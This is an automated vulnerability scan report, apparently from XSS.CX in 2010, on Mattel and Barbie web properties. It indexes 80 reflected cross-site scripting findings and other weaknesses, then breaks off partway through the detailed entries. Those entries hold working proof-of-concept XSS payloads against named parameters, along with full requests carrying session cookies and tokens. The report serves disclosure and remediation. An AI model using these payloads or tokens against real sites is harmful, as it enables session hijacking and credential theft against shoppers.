Report for barbie.com, videogirlcontest.barbie.com and related entities

Report as of 12-23-2010 @ 0030 GMT

Report generated by XSS.CX at Thu Dec 23 00:30:11 CST 2010.


Cross Site Scripting in barbie.com and related proerties

Loading


1. Cross-site scripting (reflected)

1.1. http://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]

1.2. http://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]

1.3. http://shop.mattel.com/brand/index.jsp [categoryId parameter]

1.4. http://shop.mattel.com/brand/index.jsp [categoryId parameter]

1.5. http://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]

1.6. http://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]

1.7. http://shop.mattel.com/cart/index.jsp [name of an arbitrarily supplied request parameter]

1.8. http://shop.mattel.com/cart/index.jsp [name of an arbitrarily supplied request parameter]

1.9. http://shop.mattel.com/category/index.jsp [categoryId parameter]

1.10. http://shop.mattel.com/category/index.jsp [categoryId parameter]

1.11. http://shop.mattel.com/category/index.jsp [jsessionid parameter]

1.12. http://shop.mattel.com/category/index.jsp [jsessionid parameter]

1.13. http://shop.mattel.com/category/index.jsp [name of an arbitrarily supplied request parameter]

1.14. http://shop.mattel.com/category/index.jsp [name of an arbitrarily supplied request parameter]

1.15. http://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]

1.16. http://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]

1.17. http://shop.mattel.com/family/index.jsp [cp parameter]

1.18. http://shop.mattel.com/family/index.jsp [cp parameter]

1.19. http://shop.mattel.com/family/index.jsp [jsessionid parameter]

1.20. http://shop.mattel.com/family/index.jsp [jsessionid parameter]

1.21. http://shop.mattel.com/family/index.jsp [name of an arbitrarily supplied request parameter]

1.22. http://shop.mattel.com/family/index.jsp [name of an arbitrarily supplied request parameter]

1.23. http://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]

1.24. http://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]

1.25. http://shop.mattel.com/helpdesk/index.jsp [display parameter]

1.26. http://shop.mattel.com/helpdesk/index.jsp [display parameter]

1.27. http://shop.mattel.com/helpdesk/index.jsp [jsessionid parameter]

1.28. http://shop.mattel.com/helpdesk/index.jsp [jsessionid parameter]

1.29. http://shop.mattel.com/helpdesk/index.jsp [name of an arbitrarily supplied request parameter]

1.30. http://shop.mattel.com/helpdesk/index.jsp [name of an arbitrarily supplied request parameter]

1.31. http://shop.mattel.com/helpdesk/index.jsp [stillHaveQuestion parameter]

1.32. http://shop.mattel.com/helpdesk/index.jsp [stillHaveQuestion parameter]

1.33. http://shop.mattel.com/helpdesk/index.jsp [subdisplay parameter]

1.34. http://shop.mattel.com/helpdesk/index.jsp [subdisplay parameter]

1.35. http://shop.mattel.com/home/index.jsp [jsessionid parameter]

1.36. http://shop.mattel.com/home/index.jsp [jsessionid parameter]

1.37. http://shop.mattel.com/home/index.jsp [locale parameter]

1.38. http://shop.mattel.com/home/index.jsp [locale parameter]

1.39. http://shop.mattel.com/home/index.jsp [name of an arbitrarily supplied request parameter]

1.40. http://shop.mattel.com/home/index.jsp [name of an arbitrarily supplied request parameter]

1.41. http://shop.mattel.com/product/index.jsp [cp parameter]

1.42. http://shop.mattel.com/product/index.jsp [cp parameter]

1.43. http://shop.mattel.com/product/index.jsp [name of an arbitrarily supplied request parameter]

1.44. http://shop.mattel.com/product/index.jsp [name of an arbitrarily supplied request parameter]

1.45. http://shop.mattel.com/productAlerts/index.jsp [name of an arbitrarily supplied request parameter]

1.46. http://shop.mattel.com/productAlerts/index.jsp [name of an arbitrarily supplied request parameter]

1.47. http://shop.mattel.com/reviews/submitReview.jsp [name of an arbitrarily supplied request parameter]

1.48. http://shop.mattel.com/reviews/submitReview.jsp [name of an arbitrarily supplied request parameter]

1.49. http://shop.mattel.com/shop/index.jsp [name of an arbitrarily supplied request parameter]

1.50. http://shop.mattel.com/shop/index.jsp [name of an arbitrarily supplied request parameter]

1.51. http://shop.mattel.com/sitemap/index.jsp [name of an arbitrarily supplied request parameter]

1.52. http://shop.mattel.com/sitemap/index.jsp [name of an arbitrarily supplied request parameter]

1.53. http://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]

1.54. http://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]

1.55. https://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]

1.56. https://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]

1.57. https://shop.mattel.com/brand/index.jsp [categoryId parameter]

1.58. https://shop.mattel.com/brand/index.jsp [categoryId parameter]

1.59. https://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]

1.60. https://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]

1.61. https://shop.mattel.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

1.62. https://shop.mattel.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

1.63. https://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]

1.64. https://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]

1.65. https://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]

1.66. https://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]

1.67. https://shop.mattel.com/product/wishlist/wishlist.jsp [name of an arbitrarily supplied request parameter]

1.68. https://shop.mattel.com/product/wishlist/wishlist.jsp [name of an arbitrarily supplied request parameter]

1.69. https://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]

1.70. https://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]

1.71. http://videogirlcontest.barbie.com/get_contest_entries [count parameter]

1.72. http://videogirlcontest.barbie.com/get_contest_entries [page parameter]

1.73. http://shop.mattel.com/ [Referer HTTP header]

1.74. http://shop.mattel.com/cartHandler/index.jsp [Referer HTTP header]

1.75. http://shop.mattel.com/category/index.jsp [Referer HTTP header]

1.76. http://shop.mattel.com/history/index.jsp [Referer HTTP header]

1.77. http://shop.mattel.com/home/index.jsp [Referer HTTP header]

1.78. http://shop.mattel.com/product/index.jsp [Referer HTTP header]

1.79. http://shop.mattel.com/search/controller.jsp [Referer HTTP header]

1.80. http://shop.mattel.com/shop/index.jsp [Referer HTTP header]

2. SSL cookie without secure flag set

2.1. https://shop.mattel.com/affiliate/index.jsp

2.2. https://shop.mattel.com/brand/index.jsp

2.3. https://shop.mattel.com/cart/index.jsp

2.4. https://shop.mattel.com/coreg/index.jsp

2.5. https://shop.mattel.com/coreg/index.jsp

2.6. https://shop.mattel.com/emailSignup/index.jsp

2.7. https://shop.mattel.com/giftCertificates/index.jsp

2.8. https://shop.mattel.com/product/wishlist/wishlist.jsp

2.9. https://shop.mattel.com/search/controller.jsp

2.10. https://shop.mattel.com/shop/index.jsp

2.11. https://shop.mattel.com/storeLocator/index.jsp

3. Session token in URL

3.1. http://shop.mattel.com/category/index.jsp

3.2. http://shop.mattel.com/family/index.jsp

3.3. http://shop.mattel.com/family/index.jsp

3.4. http://shop.mattel.com/helpdesk/index.jsp

3.5. http://shop.mattel.com/home/index.jsp

3.6. http://shop.mattel.com/product/index.jsp

4. Cookie without HttpOnly flag set

4.1. http://shop.mattel.com/product/index.jsp

4.2. https://shop.mattel.com/affiliate/index.jsp

4.3. https://shop.mattel.com/brand/index.jsp

4.4. https://shop.mattel.com/cart/index.jsp

4.5. https://shop.mattel.com/coreg/index.jsp

4.6. https://shop.mattel.com/coreg/index.jsp

4.7. https://shop.mattel.com/emailSignup/index.jsp

4.8. https://shop.mattel.com/giftCertificates/index.jsp

4.9. https://shop.mattel.com/product/wishlist/wishlist.jsp

4.10. https://shop.mattel.com/search/controller.jsp

4.11. https://shop.mattel.com/shop/index.jsp

4.12. https://shop.mattel.com/storeLocator/index.jsp

4.13. http://tracking.searchmarketing.com/gsic_welcome.asp

4.14. http://videogirlcontest.barbie.com/display_page

4.15. http://videogirlcontest.barbie.com/get_contest_entries

4.16. http://videogirlcontest.barbie.com/get_entry

4.17. http://b.scorecardresearch.com/b

4.18. http://pixel.fetchback.com/serve/fb/pdc

4.19. http://shop.mattel.com/category/index.jsp

4.20. http://shop.mattel.com/family/index.jsp

4.21. http://shop.mattel.com/history/index.jsp

4.22. http://shop.mattel.com/product/wishlist/wishlist.jsp

4.23. http://shop.mattel.com/search/controller.jsp

4.24. http://stats.clear-media.com/in.php

4.25. http://tags.mediaforge.com/if/146

4.26. http://tags.mediaforge.com/if/146/

4.27. http://www.barbie.com/videogirl/

5. Password field with autocomplete enabled

5.1. https://shop.mattel.com/checkout/index.jsp

5.2. https://shop.mattel.com/checkout/index.jsp

6. Source code disclosure

6.1. http://mat.imageg.net/cms_widgets/38/44/384418_assets/cruncher_largeloop2.flv

6.2. http://shop.mattel.com/affiliate/index.jsp

6.3. http://shop.mattel.com/brand/index.jsp

6.4. http://shop.mattel.com/cart/index.jsp

6.5. http://shop.mattel.com/category/index.jsp

6.6. http://shop.mattel.com/emailSignup/index.jsp

6.7. http://shop.mattel.com/family/index.jsp

6.8. http://shop.mattel.com/giftCertificates/index.jsp

6.9. http://shop.mattel.com/helpdesk/index.jsp

6.10. http://shop.mattel.com/home/index.jsp

6.11. http://shop.mattel.com/product/index.jsp

6.12. http://shop.mattel.com/productAlerts/index.jsp

6.13. http://shop.mattel.com/reviews/submitReview.jsp

6.14. http://shop.mattel.com/shop/index.jsp

6.15. http://shop.mattel.com/sitemap/index.jsp

6.16. http://shop.mattel.com/storeLocator/index.jsp

6.17. https://shop.mattel.com/affiliate/index.jsp

6.18. https://shop.mattel.com/brand/index.jsp

6.19. https://shop.mattel.com/emailSignup/index.jsp

6.20. https://shop.mattel.com/giftCertificates/index.jsp

6.21. https://shop.mattel.com/product/wishlist/wishlist.jsp

6.22. https://shop.mattel.com/storeLocator/index.jsp

7. Cookie scoped to parent domain

7.1. http://b.scorecardresearch.com/b

7.2. http://pixel.fetchback.com/serve/fb/pdc

7.3. http://tags.mediaforge.com/if/146

7.4. http://tags.mediaforge.com/if/146/

8. Cross-domain Referer leakage

8.1. http://corporate.mattel.com/mdn/js/gnav-75px.js

8.2. http://files.shoptog.com/Clients/Mattel/prod/target.js

8.3. http://shop.mattel.com/brand/index.jsp

8.4. http://shop.mattel.com/category/index.jsp

8.5. http://shop.mattel.com/category/index.jsp

8.6. http://shop.mattel.com/category/index.jsp

8.7. http://shop.mattel.com/category/index.jsp

8.8. http://shop.mattel.com/category/index.jsp

8.9. http://shop.mattel.com/category/index.jsp

8.10. http://shop.mattel.com/category/index.jsp

8.11. http://shop.mattel.com/category/index.jsp

8.12. http://shop.mattel.com/family/index.jsp

8.13. http://shop.mattel.com/family/index.jsp

8.14. http://shop.mattel.com/family/index.jsp

8.15. http://shop.mattel.com/family/index.jsp

8.16. http://shop.mattel.com/family/index.jsp

8.17. http://shop.mattel.com/family/index.jsp

8.18. http://shop.mattel.com/family/index.jsp

8.19. http://shop.mattel.com/family/index.jsp

8.20. http://shop.mattel.com/family/index.jsp

8.21. http://shop.mattel.com/family/index.jsp

8.22. http://shop.mattel.com/family/index.jsp

8.23. http://shop.mattel.com/family/index.jsp

8.24. http://shop.mattel.com/family/index.jsp

8.25. http://shop.mattel.com/family/index.jsp

8.26. http://shop.mattel.com/family/index.jsp

8.27. http://shop.mattel.com/family/index.jsp

8.28. http://shop.mattel.com/family/index.jsp

8.29. http://shop.mattel.com/family/index.jsp

8.30. http://shop.mattel.com/family/index.jsp

8.31. http://shop.mattel.com/family/index.jsp

8.32. http://shop.mattel.com/family/index.jsp

8.33. http://shop.mattel.com/family/index.jsp

8.34. http://shop.mattel.com/family/index.jsp

8.35. http://shop.mattel.com/family/index.jsp

8.36. http://shop.mattel.com/family/index.jsp

8.37. http://shop.mattel.com/family/index.jsp

8.38. http://shop.mattel.com/family/index.jsp

8.39. http://shop.mattel.com/family/index.jsp

8.40. http://shop.mattel.com/family/index.jsp

8.41. http://shop.mattel.com/family/index.jsp

8.42. http://shop.mattel.com/family/index.jsp

8.43. http://shop.mattel.com/family/index.jsp

8.44. http://shop.mattel.com/family/index.jsp

8.45. http://shop.mattel.com/family/index.jsp

8.46. http://shop.mattel.com/family/index.jsp

8.47. http://shop.mattel.com/family/index.jsp

8.48. http://shop.mattel.com/family/index.jsp

8.49. http://shop.mattel.com/family/index.jsp

8.50. http://shop.mattel.com/family/index.jsp

8.51. http://shop.mattel.com/family/index.jsp

8.52. http://shop.mattel.com/family/index.jsp

8.53. http://shop.mattel.com/family/index.jsp

8.54. http://shop.mattel.com/family/index.jsp

8.55. http://shop.mattel.com/family/index.jsp

8.56. http://shop.mattel.com/helpdesk/index.jsp

8.57. http://shop.mattel.com/home/index.jsp

8.58. http://shop.mattel.com/home/index.jsp

8.59. http://shop.mattel.com/home/index.jsp

8.60. http://shop.mattel.com/product/index.jsp

8.61. http://shop.mattel.com/shop/index.jsp

8.62. http://shop.mattel.com/shop/index.jsp

8.63. http://shop.mattel.com/shop/index.jsp

8.64. http://shop.mattel.com/shop/index.jsp

8.65. http://shop.mattel.com/shop/index.jsp

8.66. http://shop.mattel.com/shop/index.jsp

8.67. http://shop.mattel.com/shop/index.jsp

8.68. https://shop.mattel.com/brand/index.jsp

8.69. https://shop.mattel.com/checkout/index.jsp

8.70. http://videogirlcontest.barbie.com/display_page

9. Cross-domain script include

9.1. http://shop.mattel.com/affiliate/index.jsp

9.2. http://shop.mattel.com/brand/index.jsp

9.3. http://shop.mattel.com/cart/index.jsp

9.4. http://shop.mattel.com/category/index.jsp

9.5. http://shop.mattel.com/emailSignup/index.jsp

9.6. http://shop.mattel.com/family/index.jsp

9.7. http://shop.mattel.com/family/index.jsp

9.8. http://shop.mattel.com/giftCertificates/index.jsp

9.9. http://shop.mattel.com/helpdesk/index.jsp

9.10. http://shop.mattel.com/home/index.jsp

9.11. http://shop.mattel.com/min-cat/site-js.xml.min.js

9.12. http://shop.mattel.com/product/index.jsp

9.13. http://shop.mattel.com/productAlerts/index.jsp

9.14. http://shop.mattel.com/reviews/submitReview.jsp

9.15. http://shop.mattel.com/shop/index.jsp

9.16. http://shop.mattel.com/sitemap/index.jsp

9.17. http://shop.mattel.com/storeLocator/index.jsp

9.18. https://shop.mattel.com/affiliate/index.jsp

9.19. https://shop.mattel.com/brand/index.jsp

9.20. https://shop.mattel.com/checkout/index.jsp

9.21. https://shop.mattel.com/emailSignup/index.jsp

9.22. https://shop.mattel.com/giftCertificates/index.jsp

9.23. https://shop.mattel.com/min-cat/site-js.xml.min.js

9.24. https://shop.mattel.com/product/wishlist/wishlist.jsp

9.25. https://shop.mattel.com/storeLocator/index.jsp

9.26. http://www.barbie.com/videogirl/

10. Email addresses disclosed

10.1. http://shop.mattel.com/shop/index.jsp

10.2. http://shop.mattel.com/shop/index.jsp

10.3. https://shop.mattel.com/brand/index.jsp

10.4. https://shop.mattel.com/checkout/index.jsp

10.5. https://shop.mattel.com/checkout/index.jsp

10.6. https://shop.mattel.com/giftCertificates/index.jsp

10.7. https://shop.mattel.com/storeLocator/index.jsp

10.8. http://videogirlcontest.barbie.com/display_page

10.9. http://videogirlcontest.barbie.com/global/share/js/jqModal.js

10.10. http://videogirlcontest.barbie.com/public/css/jqModal.css

10.11. http://www.barbie.com/videogirl/_swf/home-video-01.swf

11. Cacheable HTTPS response

11.1. https://shop.mattel.com/affiliate/index.jsp

11.2. https://shop.mattel.com/brand/index.jsp

11.3. https://shop.mattel.com/emailSignup/index.jsp

11.4. https://shop.mattel.com/giftCertificates/index.jsp

11.5. https://shop.mattel.com/storeLocator/index.jsp

12. Multiple content types specified

12.1. http://tags.mediaforge.com/if/146

12.2. http://tags.mediaforge.com/if/146/

13. HTML does not specify charset

14. Content type incorrectly stated

14.1. http://9d060c.r.axf8.net/mr/a.gif

14.2. http://cdn.triggertag.gorillanation.com/js/3711_US.php

14.3. http://corporate.mattel.com/mdn/js/gnav-75px.js

14.4. http://mat.imageg.net/cms_widgets/38/44/384418_assets/cruncher_largeloop2.flv

14.5. http://pixel.fetchback.com/serve/fb/pdc

14.6. http://statse.webtrendslive.com//wtid.js

14.7. http://videogirlcontest.barbie.com/global/__utm.gif

14.8. http://videogirlcontest.barbie.com/global/js/metrics-ga.js

14.9. http://videogirlcontest.barbie.com/global/share/js/jqModal.js

14.10. http://videogirlcontest.barbie.com/global/share/js/jquery.js

14.11. http://videogirlcontest.barbie.com/global/share/js/swfobject.js

14.12. http://videogirlcontest.barbie.com/global/share/js/util.js

14.13. http://videogirlcontest.barbie.com/global/share/js/validator.js

14.14. http://www.barbie.com/videogirl/_img/background_v.jpg



1. Cross-site scripting (reflected)  next
There are 80 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /affiliate/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0809"-alert(1)-"1880324d77a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliate/index.jsp?b0809"-alert(1)-"1880324d77a=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:27 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38154


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="b0809"-alert(1)-"1880324d77a=1";
   </script>
...[SNIP]...

1.2. http://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /affiliate/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e87b--><script>alert(1)</script>1e6ec6e0f69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /affiliate/index.jsp?5e87b--><script>alert(1)</script>1e6ec6e0f69=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:28 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38196


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<!-- === Request Query String: 5e87b--><script>alert(1)</script>1e6ec6e0f69=1 -->
...[SNIP]...

1.3. http://shop.mattel.com/brand/index.jsp [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The value of the categoryId request parameter is copied into an HTML comment. The payload 43c97--><script>alert(1)</script>e030957103d was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /brand/index.jsp?categoryId=376813143c97--><script>alert(1)</script>e030957103d HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:12 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31245


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<!-- === Request Query String: categoryId=376813143c97--><script>alert(1)</script>e030957103d -->
...[SNIP]...

1.4. http://shop.mattel.com/brand/index.jsp [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The value of the categoryId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da6d"-alert(1)-"8a42c67e1e8 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/index.jsp?categoryId=37681313da6d"-alert(1)-"8a42c67e1e8 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:11 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31213


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="categoryId=37681313da6d"-alert(1)-"8a42c67e1e8";
   </script>
...[SNIP]...

1.5. http://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

